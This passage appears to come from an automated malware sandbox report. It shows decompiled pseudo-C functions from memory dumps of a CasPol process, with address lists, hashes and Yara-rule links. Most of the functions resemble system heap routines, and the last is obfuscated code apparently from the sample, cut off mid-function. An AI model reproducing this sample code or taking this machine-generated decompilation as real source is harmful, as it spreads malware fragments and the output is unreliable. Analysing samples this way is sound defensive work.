														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x16dfcfb) & 0x000000ff) * 4 +  &M016DFCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E016EA80D(_t168);
				}
				return E0167D0D1(_t98);
			}


























                                                                0x016dfa2b
                                                                0x016dfa2b
                                                                0x016dfa2d
                                                                0x016dfa32
                                                                0x016dfa37
                                                                0x016dfa3a
                                                                0x016dfa3c
                                                                0x016dfa43
                                                                0x016dfa46
                                                                0x016dfa49
                                                                0x016dfa4f
                                                                0x016dfa55
                                                                0x016dfa58
                                                                0x016dfa5d
                                                                0x016dfa65
                                                                0x016dfa6d
                                                                0x016dfa72
                                                                0x016dfa78
                                                                0x016dfa7e
                                                                0x016dfa8c
                                                                0x016dfaa2
                                                                0x016dfaa7
                                                                0x016dfaaa
                                                                0x016dfaaf
                                                                0x016dfac4
                                                                0x016dfab1
                                                                0x016dfac0
                                                                0x016dfac0
                                                                0x016dfac8
                                                                0x016dfacb
                                                                0x016dfad5
                                                                0x016dfadb
                                                                0x016dfae1
                                                                0x016dfb05
                                                                0x016dfb05
                                                                0x016dfb08
                                                                0x016dfb0b
                                                                0x016dfb15
                                                                0x016dfb98
                                                                0x016dfb9f
                                                                0x016dfba5
                                                                0x016dfbb4
                                                                0x016dfbb6
                                                                0x016dfbb7
                                                                0x016dfbbd
                                                                0x00000000
                                                                0x016dfbbd
                                                                0x016dfb17
                                                                0x016dfb17
                                                                0x016dfb17
                                                                0x016dfb1a
                                                                0x016dfb22
                                                                0x016dfb40
                                                                0x016dfb47
                                                                0x016dfb4c
                                                                0x016dfb4e
                                                                0x016dfb54
                                                                0x016dfb5a
                                                                0x016dfb5a
                                                                0x016dfb60
                                                                0x016dfb66
                                                                0x016dfb6d
                                                                0x016dfb70
                                                                0x016dfb73
                                                                0x016dfb78
                                                                0x016dfb7d
                                                                0x016dfb8c
                                                                0x016dfb90
                                                                0x016dfbbf
                                                                0x016dfbbf
                                                                0x016dfbc6
                                                                0x016dfbcd
                                                                0x016dfc18
                                                                0x016dfc18
                                                                0x016dfc23
                                                                0x016dfc3d
                                                                0x016dfc3d
                                                                0x016dfc25
                                                                0x016dfc25
                                                                0x016dfc2b
                                                                0x016dfc2d
                                                                0x016dfc33
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfc33
                                                                0x016dfbcf
                                                                0x016dfbd9
                                                                0x016dfbdf
                                                                0x016dfc00
                                                                0x016dfc06
                                                                0x016dfbe1
                                                                0x016dfbe1
                                                                0x016dfbe3
                                                                0x016dfbe9
                                                                0x016dfbf5
                                                                0x016dfbeb
                                                                0x016dfbee
                                                                0x016dfbf0
                                                                0x016dfbf0
                                                                0x016dfbf7
                                                                0x016dfbfb
                                                                0x016dfc09
                                                                0x016dfc10
                                                                0x016dfc16
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfc16
                                                                0x016dfbcd
                                                                0x016dfb7d
                                                                0x016dfb60
                                                                0x016dfb54
                                                                0x016dfb22
                                                                0x016dfae3
                                                                0x016dfae3
                                                                0x016dfaed
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfaed
                                                                0x016dfae1
                                                                0x016dfad5
                                                                0x016dfa8c
                                                                0x016dfc44
                                                                0x016dfc72
                                                                0x016dfc7c
                                                                0x016dfc82
                                                                0x016dfc82
                                                                0x016dfc84
                                                                0x016dfc8a
                                                                0x016dfcca
                                                                0x016dfcca
                                                                0x016dfccb
                                                                0x016dfccc
                                                                0x016dfccf
                                                                0x016dfcd0
                                                                0x00000000
                                                                0x016dfc8c
                                                                0x016dfc93
                                                                0x00000000
                                                                0x016dfc9a
                                                                0x016dfc9b
                                                                0x016dfc9c
                                                                0x016dfc9f
                                                                0x016dfca0
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfca4
                                                                0x016dfca5
                                                                0x016dfca6
                                                                0x016dfca9
                                                                0x016dfcaa
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfcae
                                                                0x016dfcaf
                                                                0x016dfcb0
                                                                0x016dfcb2
                                                                0x016dfcb3
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfcb7
                                                                0x016dfcb8
                                                                0x016dfcb9
                                                                0x016dfcbc
                                                                0x016dfcbd
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfcc1
                                                                0x016dfcc2
                                                                0x016dfcc3
                                                                0x016dfcc5
                                                                0x016dfcc6
                                                                0x016dfcd2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016dfc93
                                                                0x016dfcd3
                                                                0x016dfcd5
                                                                0x016dfcd5
                                                                0x016dfcdf

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b96bc7eeec13097f25dfcde7b107423fd8a5345a078d731bd051702699331e08
                                                                • Instruction ID: 15c15964023b4d4452173c6a5f77a5c0450f9f9521607427a5553cb65d726819
                                                                • Opcode Fuzzy Hash: b96bc7eeec13097f25dfcde7b107423fd8a5345a078d731bd051702699331e08
                                                                • Instruction Fuzzy Hash: 84815C70D002469FDB19CF69C8906BAFBF1FF48304F54819AE946AB381D374A992CF64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016EDBD2 Relevance: .2, Instructions: 212COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E016EDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1716114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L016ED016(_t119, _t183, _t119, _t78);
									E0163FFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E016EC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x160aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E0163FFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E016EE018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x160aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E0166D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E016ED864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E016ED8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E016EA80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}








































                                                                0x016edbdc
                                                                0x016edbde
                                                                0x016edbe1
                                                                0x016edbed
                                                                0x016edbef
                                                                0x016edbf7
                                                                0x016edbfd
                                                                0x016edc00
                                                                0x016edc04
                                                                0x016edc07
                                                                0x016edc0c
                                                                0x016edd1f
                                                                0x016edd1f
                                                                0x016edd23
                                                                0x016edd26
                                                                0x016edd29
                                                                0x016edd29
                                                                0x016edd2c
                                                                0x016edd32
                                                                0x016edd35
                                                                0x00000000
                                                                0x016edd38
                                                                0x016edd3a
                                                                0x016edd5d
                                                                0x016edd63
                                                                0x016edd69
                                                                0x016edd6e
                                                                0x016edd71
                                                                0x016edd78
                                                                0x016edd7d
                                                                0x016edd8c
                                                                0x016edd9e
                                                                0x016edda0
                                                                0x016eddad
                                                                0x016eddb0
                                                                0x016eddb5
                                                                0x016eddb9
                                                                0x016eddd9
                                                                0x016eddd9
                                                                0x016eddde
                                                                0x016edde0
                                                                0x016edde3
                                                                0x016edde5
                                                                0x016edde9
                                                                0x016edde9
                                                                0x016eddee
                                                                0x016eddf6
                                                                0x016eddf6
                                                                0x016edd97
                                                                0x00000000
                                                                0x00000000
                                                                0x016edd9b
                                                                0x00000000
                                                                0x016edd9b
                                                                0x016edd7f
                                                                0x00000000
                                                                0x016edd7f
                                                                0x016edd3f
                                                                0x016edd54
                                                                0x016edd58
                                                                0x016edd86
                                                                0x00000000
                                                                0x016edd86
                                                                0x00000000
                                                                0x016edd5a
                                                                0x016edd5a
                                                                0x016edd5a
                                                                0x00000000
                                                                0x016edd5a
                                                                0x016edd3f
                                                                0x016edd38
                                                                0x016edc12
                                                                0x016edc15
                                                                0x016edc25
                                                                0x016edc31
                                                                0x016edc34
                                                                0x016edc3b
                                                                0x016edc3e
                                                                0x016edc40
                                                                0x016edc43
                                                                0x016edc46
                                                                0x016edc62
                                                                0x016edc6b
                                                                0x016edc6d
                                                                0x016edc48
                                                                0x016edc4b
                                                                0x016edc59
                                                                0x016edc5c
                                                                0x016edc5c
                                                                0x016edc72
                                                                0x016edc78
                                                                0x016edc7f
                                                                0x016edc81
                                                                0x016edc81
                                                                0x016edc84
                                                                0x016edc88
                                                                0x016edc8d
                                                                0x016edc95
                                                                0x016edc9b
                                                                0x016edca0
                                                                0x016edca2
                                                                0x016edca6
                                                                0x016edca6
                                                                0x016edcb0
                                                                0x016edcd1
                                                                0x016edcd4
                                                                0x016edcda
                                                                0x016edcec
                                                                0x016edcf1
                                                                0x016edcf6
                                                                0x016edd0c
                                                                0x016edd1a
                                                                0x016edd1a
                                                                0x016edcf6
                                                                0x00000000
                                                                0x016edcda
                                                                0x016edcb5
                                                                0x016edcb6
                                                                0x016edcc5
                                                                0x016edcca
                                                                0x016edcca

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: efde6453b6da94dfdb550894d244c29cd48bb062de9a6c7f637b0528f0c28bd5
                                                                • Instruction ID: c79a6d6360404dfcefe05229f56fe9133500bdd41369ee56881fd6cb3a4ef157
                                                                • Opcode Fuzzy Hash: efde6453b6da94dfdb550894d244c29cd48bb062de9a6c7f637b0528f0c28bd5
                                                                • Instruction Fuzzy Hash: 6A713A76E011299FCB14DF99CC849BEBBF5EF88210B004259E845EB384D735C906CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F28EC Relevance: .2, Instructions: 211COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 97%
                                                                			E016F28EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E01642280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x1716110; // 0x3951a168
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x1716110; // 0x3951a168
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E016F25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E0163FFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x1716110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E016F2506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E0163FFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E0166FA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E016EA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E0163FFB0(_t115, _t145, _t147);
							}
							_t104 = E016F3149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E01642280(_t104, _t147);
								}
								_v5 = 0xff;
								E016F2876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}











































                                                                0x016f28f5
                                                                0x016f28fa
                                                                0x016f28fe
                                                                0x016f2900
                                                                0x016f2906
                                                                0x016f2908
                                                                0x016f2908
                                                                0x016f290e
                                                                0x016f2915
                                                                0x016f2918
                                                                0x016f291b
                                                                0x016f291d
                                                                0x016f2920
                                                                0x016f2920
                                                                0x016f2929
                                                                0x016f292c
                                                                0x016f292f
                                                                0x016f2932
                                                                0x016f2935
                                                                0x016f2938
                                                                0x016f293d
                                                                0x016f293d
                                                                0x016f2940
                                                                0x016f2944
                                                                0x016f2944
                                                                0x016f2948
                                                                0x016f294a
                                                                0x016f2950
                                                                0x016f2953
                                                                0x016f2958
                                                                0x00000000
                                                                0x00000000
                                                                0x016f295a
                                                                0x016f2962
                                                                0x016f2965
                                                                0x016f2976
                                                                0x016f2978
                                                                0x016f29e0
                                                                0x016f29e4
                                                                0x016f29e6
                                                                0x016f29e8
                                                                0x016f29eb
                                                                0x016f2993
                                                                0x016f2993
                                                                0x00000000
                                                                0x016f2993
                                                                0x016f29ed
                                                                0x016f29ef
                                                                0x00000000
                                                                0x00000000
                                                                0x016f29f1
                                                                0x00000000
                                                                0x016f29f1
                                                                0x016f297a
                                                                0x016f299b
                                                                0x016f299d
                                                                0x016f29f5
                                                                0x016f29fb
                                                                0x016f29fb
                                                                0x016f2a00
                                                                0x016f2a04
                                                                0x016f2a04
                                                                0x016f2a06
                                                                0x016f2a13
                                                                0x016f2a13
                                                                0x016f2a18
                                                                0x016f2a44
                                                                0x016f2a44
                                                                0x016f2a44
                                                                0x016f2a46
                                                                0x016f2a50
                                                                0x016f2a5a
                                                                0x016f2a5e
                                                                0x016f2a99
                                                                0x016f2a9e
                                                                0x016f2aa0
                                                                0x016f2a70
                                                                0x016f2a70
                                                                0x016f2a72
                                                                0x016f2a75
                                                                0x016f2a82
                                                                0x016f2a89
                                                                0x016f2a89
                                                                0x016f2a7a
                                                                0x016f2a7f
                                                                0x016f2a7f
                                                                0x016f2a7f
                                                                0x00000000
                                                                0x016f2a7f
                                                                0x016f2aa4
                                                                0x016f2aa4
                                                                0x016f2ab6
                                                                0x016f2abd
                                                                0x016f2ac0
                                                                0x016f2ac4
                                                                0x016f2ac6
                                                                0x016f2ac9
                                                                0x016f2acf
                                                                0x016f2ad1
                                                                0x016f2ad3
                                                                0x016f2ad3
                                                                0x016f2ad3
                                                                0x016f2acf
                                                                0x016f2ad6
                                                                0x016f2ad9
                                                                0x016f2adb
                                                                0x016f2add
                                                                0x016f2af9
                                                                0x016f2af9
                                                                0x016f2aff
                                                                0x016f2adf
                                                                0x016f2adf
                                                                0x016f2ae7
                                                                0x016f2aea
                                                                0x016f2aef
                                                                0x016f2af4
                                                                0x016f2af4
                                                                0x016f2b01
                                                                0x016f2b05
                                                                0x016f2b08
                                                                0x016f2b08
                                                                0x016f2b0d
                                                                0x016f2b11
                                                                0x016f2b1b
                                                                0x016f2b20
                                                                0x00000000
                                                                0x016f2b11
                                                                0x016f2a60
                                                                0x016f2a61
                                                                0x016f2a6b
                                                                0x00000000
                                                                0x016f2a6b
                                                                0x016f2a1f
                                                                0x016f2a25
                                                                0x016f2a25
                                                                0x016f2a27
                                                                0x016f2a38
                                                                0x016f2a3d
                                                                0x016f2a3d
                                                                0x016f2a3f
                                                                0x016f2a3f
                                                                0x00000000
                                                                0x016f2a3f
                                                                0x016f2a2c
                                                                0x016f2a2c
                                                                0x016f2a31
                                                                0x00000000
                                                                0x00000000
                                                                0x016f2a36
                                                                0x016f2a36
                                                                0x00000000
                                                                0x016f2a36
                                                                0x016f2a0c
                                                                0x00000000
                                                                0x016f2a0c
                                                                0x016f29a1
                                                                0x016f29a4
                                                                0x016f29a4
                                                                0x016f29b0
                                                                0x016f29b5
                                                                0x016f29b9
                                                                0x00000000
                                                                0x016f29bf
                                                                0x016f29c3
                                                                0x016f29c6
                                                                0x016f29c6
                                                                0x016f29cd
                                                                0x016f29d3
                                                                0x016f29d8
                                                                0x00000000
                                                                0x016f29d8
                                                                0x016f29b9
                                                                0x016f2980
                                                                0x016f2983
                                                                0x016f2990
                                                                0x00000000
                                                                0x016f2989
                                                                0x016f2989
                                                                0x016f298c
                                                                0x016f298c
                                                                0x016f2995
                                                                0x016f2995
                                                                0x016f2999
                                                                0x016f2999
                                                                0x00000000
                                                                0x016f2999

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8b1cb39049c95244c5b35370ec7d7ee33ce4ef3e428a242d02ef31163a909b8
                                                                • Instruction ID: 75519e6b274423b8d0eaae4106d76ae09a009aa90dcaed95ed8b60f310bea347
                                                                • Opcode Fuzzy Hash: d8b1cb39049c95244c5b35370ec7d7ee33ce4ef3e428a242d02ef31163a909b8
                                                                • Instruction Fuzzy Hash: E871E231A0010A9FDB25CF6DCCA06AEBBE2EF88250F14856DEA15D7384DB34D946CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00423220 Relevance: .2, Instructions: 209COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 58%
                                                                			E00423220() {
				signed int _t32;
				signed int _t33;
				signed int _t34;
				void* _t39;
				signed char _t42;
				signed int _t44;
				signed char _t47;
				void* _t53;
				void* _t54;
				signed int _t55;
				void* _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t66;

				_t33 = _t32 & 0x853fd4e9;
				asm("das");
				asm("rol dword [0xd918f40f], 0x70");
				asm("adc ebp, [0x35beec61]");
				_t62 = _t61 ^  *0x77b439ce;
				_t66 = _t65 ^  *0xd11b3805;
				asm("rcl dword [0xa1cafd33], 0xf");
				asm("adc [0x7e84b4cf], esi");
				_t42 = (_t39 + 0xd8f96164 | 0x000000e2) - 1;
				 *0xae1227fc =  *0xae1227fc + _t63;
				 *0x1277eeda =  *0x1277eeda >> 0x31;
				if(_t33 == 0xe896e921) {
					__eax = __eax ^  *0xb9e06975;
					__ebp = __ebp -  *0x874a513e;
					asm("adc bh, [0x9915ad34]");
					_t28 = __ecx;
					__ecx =  *0xf14c3e26;
					 *0xf14c3e26 = _t28;
					 *0xaeff63d7 =  *0xaeff63d7 >> 0x1c;
					asm("sbb dh, 0xb3");
					_push(__ebx);
					if(__esi >= 0) {
						 *0x5dca2772 =  *0x5dca2772 - __ebp;
						asm("movsw");
						 *0x5f11cce4 = __dh;
						__edi = __edi - 1;
						__ebx = __ebx | 0x587d12ee;
						 *0xddd0401b =  *0xddd0401b >> 0x5d;
						L1();
						asm("adc ebp, [0x2e0215e8]");
						asm("sbb dl, 0x0");
						if( *0xddd0401b < 0) {
							__edx = __edx +  *0x6dd38b71;
							asm("stosd");
							__ebx = __ebx - 1;
							asm("cmpsw");
							__edi = __edi +  *0x36e532dc;
							asm("sbb al, [0xbaec0330]");
							 *0x69dc11f =  *0x69dc11f ^ __esp;
